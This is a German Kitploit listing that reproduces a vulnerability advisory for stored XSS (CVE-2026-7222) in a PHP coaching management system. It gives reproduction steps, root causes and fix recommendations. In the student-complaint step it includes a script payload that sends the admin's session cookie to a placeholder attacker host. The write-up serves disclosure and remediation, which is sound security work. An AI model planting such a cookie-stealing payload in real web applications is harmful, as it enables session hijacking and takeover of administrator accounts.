Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-7222-XSS — Proof-of-Concept-Exploit für gespeichertes XSS (CWE-79) in einem PHP-Coaching-Management-System, das Session-Hijacking und Privilegieneskalation von Schüler zu Admin durch Cookie-Diebstahl demonstriert. | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-7222-xss
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubxmyronn/cve-2026-7222-xss

CVE-2026-7222-XSS

Proof-of-Concept-Exploit für gespeichertes XSS (CWE-79) in einem PHP-Coaching-Management-System, das Session-Hijacking und Privilegieneskalation von Schüler zu Admin durch Cookie-Diebstahl demonstriert.

Repository anzeigen
8vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Stored Cross-Site Scripting (XSS) im Coaching Management System führt zur Kontenübernahme


Produkt

Coaching Management System in PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/


Betroffene Komponenten

  • /modules/student/complaint.php (Beschwerde einreichen)
  • /modules/admin/incomingcomplaint.php (Beschwerden ansehen)
  • Antwortfunktion für Beschwerden (Admin/Lehrer → Schüler)

Version

Unbekannt (Keine Versionsinformationen vom Anbieter bereitgestellt; getestet auf der neuesten verfügbaren Version von Code-Projects.org ab April 2026)


Schwachstellentyp

CWE-79: Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten (Stored Cross-Site Scripting)


Beschreibung

Die Anwendung bereinigt die vom Benutzer bereitgestellten Eingaben in der Beschwerde- und Antwortfunktion nicht ordnungsgemäß. Bösartiges JavaScript, das von einem Benutzer mit niedrigen Berechtigungen injiziert wird, wird gespeichert und ausgeführt, wenn es von Benutzern mit höheren Berechtigungen wie Administratoren oder Lehrern angesehen wird.

Darüber hinaus ist auch die Antwortfunktion anfällig, sodass Administratoren oder Lehrer JavaScript injizieren können, das in Benutzersitzungen von Schülern ausgeführt wird.

Dies führt zu einer Stored-XSS-Schwachstelle, die mehrere Benutzerrollen betrifft.


Schritte zur Reproduktion

Fall 1: Schüler → Admin (Berechtigungserweiterung)

  1. Melden Sie sich als Schüler an

  2. Navigieren Sie zu: /modules/student/complaint.php Screenshot 2026-04-10 212940

  3. Reichen Sie eine Beschwerde mit folgendem Payload ein:

<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Screenshot 2026-04-10 213341
  1. Melden Sie sich als Administrator an

  2. Navigieren Sie zu: /modules/admin/incomingcomplaint.php Screenshot 2026-04-10 212951

  3. Wenn der Administrator die Beschwerde ansieht, wird der Payload automatisch ausgeführt

  4. Das Sitzungscookie des Administrators wird an den vom Angreifer kontrollierten Server gesendet

  5. Verwenden Sie das gestohlene Sitzungscookie, um die Administrator-Sitzung zu übernehmen Screenshot 2026-04-10 213350

    Screenshot 2026-04-10 213406

Fall 2: Admin → Schüler (Reverse XSS)

  1. Melden Sie sich als Administrator an
  2. Antworten Sie auf eine Beschwerde mit folgendem Payload:
  1. Melden Sie sich als Schüler an
  2. Sehen Sie sich die Antwort auf die Beschwerde an

Proof of Concept Nachweise

  • JavaScript-Ausführung im Admin-Panel beim Anzeigen einer bösartigen Beschwerde bestätigt
  • Sitzungscookie (PHPSESSID) erfolgreich über den vom Angreifer kontrollierten Server exfiltriert
  • Administrator-Sitzung mit gestohlenem Cookie übernommen
  • JavaScript-Ausführung im Schüler-Panel über die Antwortfunktion bestätigt

Auswirkungen

  • Benutzer mit niedrigen Berechtigungen (Schüler) können beliebiges JavaScript im Admin-Kontext ausführen
  • Führt aufgrund des Fehlens des HttpOnly-Flags zur Sitzungsübernahme
  • Vollständige Übernahme des Administratorkontos
  • Bidirektionales XSS ermöglicht die Kompromittierung mehrerer Rollen (Admin, Lehrer, Schüler)
  • Vollständige Kompromittierung der Integrität, Vertraulichkeit und Verfügbarkeit der Anwendung

Schweregrad: KRITISCH


Ursache

  • Fehlende Eingabebereinigung
  • Fehlende Ausgabekodierung
  • Fehlende Sicherheitskontrollen für Sitzungscookies (HttpOnly-Flag nicht gesetzt)

Empfehlung

  • Bereinigen und validieren Sie alle Benutzereingaben.
  • Kodieren Sie die Ausgabe mit Funktionen wie htmlspecialchars() in PHP
  • Setzen Sie die HttpOnly- und Secure-Flags für Sitzungscookies
  • Implementieren Sie eine Content Security Policy (CSP)

Tool herunterladen